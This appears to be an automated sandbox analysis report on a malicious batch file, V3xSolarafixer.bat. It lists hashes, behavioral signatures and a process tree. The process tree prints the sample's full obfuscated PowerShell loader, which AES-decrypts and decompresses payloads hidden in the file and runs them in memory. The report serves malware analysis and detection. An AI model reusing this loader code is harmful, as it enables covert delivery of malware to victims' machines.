Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 17:23
Static task
static1
Behavioral task
behavioral1
Sample
V3xSolarafixer.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
V3xSolarafixer.bat
-
Size
395KB
-
MD5
003edf4319e31d48f44daee2df888005
-
SHA1
bcd6f33116f746a10185af4d17cbf0357c11657b
-
SHA256
60193565df3a7afe6f4bf343da48595a20bc8afed9d60f890b6a2d1c1ce8b65f
-
SHA512
1e961d0bec6b7368d6f6732ca854c995f3caedd3e87fe3a809f5b263d866adc6146295e60fdb0216257b709ace3836241210617d6060cf8b56e74a9d5e52785e
-
SSDEEP
12288:NsUM5zunGyNyChna0ZF2NB6RjTQ+SXbBBoz9u:Ns3zuVZxZF2v0QntBr
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2740 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 3028 wrote to memory of 2888 3028 cmd.exe 31 PID 3028 wrote to memory of 2888 3028 cmd.exe 31 PID 3028 wrote to memory of 2888 3028 cmd.exe 31 PID 3028 wrote to memory of 2740 3028 cmd.exe 32 PID 3028 wrote to memory of 2740 3028 cmd.exe 32 PID 3028 wrote to memory of 2740 3028 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\V3xSolarafixer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0AY9QqE64KYNO3BobF4rEV/9BwD+VjvRGEbrJkSp4fg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mrrNM2f8mYDdXAATgGNaVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AQxCf=New-Object System.IO.MemoryStream(,$param_var); $ZqFkk=New-Object System.IO.MemoryStream; $PdtbZ=New-Object System.IO.Compression.GZipStream($AQxCf, [IO.Compression.CompressionMode]::Decompress); $PdtbZ.CopyTo($ZqFkk); $PdtbZ.Dispose(); $AQxCf.Dispose(); $ZqFkk.Dispose(); $ZqFkk.ToArray();}function execute_function($param_var,$param2_var){ $bWVGo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Kufeg=$bWVGo.EntryPoint; $Kufeg.Invoke($null, $param2_var);}$kXsdB = 'C:\Users\Admin\AppData\Local\Temp\V3xSolarafixer.bat';$host.UI.RawUI.WindowTitle = $kXsdB;$muZhB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kXsdB).Split([Environment]::NewLine);foreach ($lHFNb in $muZhB) { if ($lHFNb.StartsWith('HfjZxvAKjxumhUHaISov')) { $YXzqF=$lHFNb.Substring(20); break; }}$payloads_var=[string[]]$YXzqF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-